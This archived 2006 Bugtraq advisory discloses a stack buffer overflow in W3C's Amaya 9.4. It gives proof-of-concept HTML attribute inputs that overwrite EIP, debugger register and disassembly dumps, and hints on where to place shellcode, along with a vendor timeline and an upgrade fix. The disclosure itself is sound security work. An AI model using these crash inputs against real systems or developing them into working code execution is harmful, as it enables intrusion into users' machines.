| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 12 Apr 2006 23:31:32 -0000 From: bugtraq@...ph3us.org To: bugtraq@...urityfocus.com Subject: [BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 --------------------------------------------------- | BuHa Security-Advisory #10 | Apr 12th, 2006 | --------------------------------------------------- | Vendor | W3C's Amaya | | URL | http://www.w3.org/Amaya/ | | Version | <= 9.4 | | Risk | Critical (Remote Code Execution) | --------------------------------------------------- o Description: ============= The current releases, Amaya 9.5, is available for Linux, Windows and now MacOS X (see screenshot). It supports HTML 4.01, XHTML 1.0, XHTML Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, many CSS 2 features, and includes SVG support (transformation, transparency, and SMIL animation). See the "Amaya Overview" page [1] for more details. o Stack overflow: ================ Both of the two below posted code snippets (in fact there are dozens of possible snippets but all of them trigger the same bug) force Amaya 9.4 to crash: > <colgroup compact="Ax200"> > [...] > <textarea rows="Ax200"> After the first glance at the generated error report and respectively the ASM code during the access violation I thought I came across a heap based buffer overflow. > eax=000000f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420 > edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0 > cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206 > > 004edd61 03f3 add esi,ebx > 004edd63 a4 movsb > 004edd64 8b4500 mov eax,[ebp] > 004edd67 8b8c241c010000 mov ecx,[esp+0x11c] > 004edd6e 8b942418010000 mov edx,[esp+0x118] > 004edd75 50 push eax > 004edd76 51 push ecx > 004edd77 53 push ebx > 004edd78 52 push edx > 004edd79 e8a23c0200 call amaya+0x111a20 (00511a20) > 004edd7e 53 push ebx > 004edd7f e83cf90000 call amaya+0xfd6c0 (004fd6c0) > 004edd84 83c428 add esp,0x28 > 004edd87 8bbc24fc000000 mov edi,[esp+0xfc] > 004edd8e 8b942400010000 mov edx,[esp+0x100] > FAULT ->004edd95 8b4240 mov eax,[edx+0x40] > ds:0023:41414181=???????? > 004edd98 83f844 cmp eax,0x44 > 004edd9b 0f8527030000 jne amaya+0xee0c8 (004ee0c8) > 004edda1 837c242457 cmp dword ptr [esp+0x24],0x57 > 004edda6 0f8465060000 je amaya+0xee411 (004ee411) > 004eddac 8b4500 mov eax,[ebp] > 004eddaf 8b8c2408010000 mov ecx,[esp+0x108] > 004eddb6 6aff push 0xff > 004eddb8 50 push eax > 004eddb9 51 push ecx > 004eddba 57 push edi > 004eddbb e8d33af1ff call amaya+0x1893 (00401893) > 004eddc0 83c410 add esp,0x10 > 004eddc3 5f pop edi > 004eddc4 5e pop esi > 004eddc5 5d pop ebp After a second, more precise look, the evitable heap overflow turned out to be a stack based overflow.. We are able to control the EIP: > <textarea rows= > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB> > eax=00000001 ebx=00000000 ecx=77c10e72 edx=007bd472 > esi=0000003e edi=00000000 eip=42424242 esp=0012ea38 ebp=00000000 > Function: <nosymbols> > No prior disassembly possible > 42424242 ?? ??? > 42424244 ?? ??? > 42424246 ?? ??? > 42424248 ?? ??? > 4242424a ?? ??? > 4242424c ?? ??? Online-demo: http://morph3us.org/security/pen-testing/amaya/amaya-94-textarea-rows.html In fact, sucessful exploitation of this vulnerability is not that easy because non-text characters were modfified during parsing therefore you have to find a place where to place the shellcode. Naturally you have to avoid null bytes too because Amaya would stop parsing the attribute value and the overflow would not get triggered. o Disclosure Timeline: ===================== 21 Dec 05 - Vulnerability discovered. 21 Feb 06 - Vendor contacted. 23 Feb 06 - Vendor confirmed vulnerability. 08 Mar 06 - Vendor fixed vulnerability. 12 Apr 06 - Public release. o Solution: ========== Upgrade to the latest version of Amaya. [2] o Credits: ========= Thomas Waldegger <bugtraq@...ph3us.org> BuHa-Security Community - http://buha.info/board/ If you have questions, suggestions or criticism about the advisory feel free to send me a mail. The address 'bugtraq@...ph3us.org' is more a spam address than a regular mail address therefore it's possible that some mails get ignored. Please use the contact details at http://morph3us.org/ to contact me. Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all members of BuHa. Advisory online: http://morph3us.org/advisories/20060412-amaya-94.txt [1] http://www.w3.org/Amaya/Amaya.html [2] http://www.w3.org/Amaya/User/BinDist.html -----BEGIN PGP SIGNATURE----- Version: n/a Comment: http://morph3us.org/ iD8DBQFEPYALkCo6/ctnOpYRA5yzAJ9j/ki1dPCxPToftjLYHTUkCoGzyACfffaM zCHSYS6ScvGJcRjuzqovGv4= =wD6S -----END PGP SIGNATURE-----
Powered by blists - more mailing lists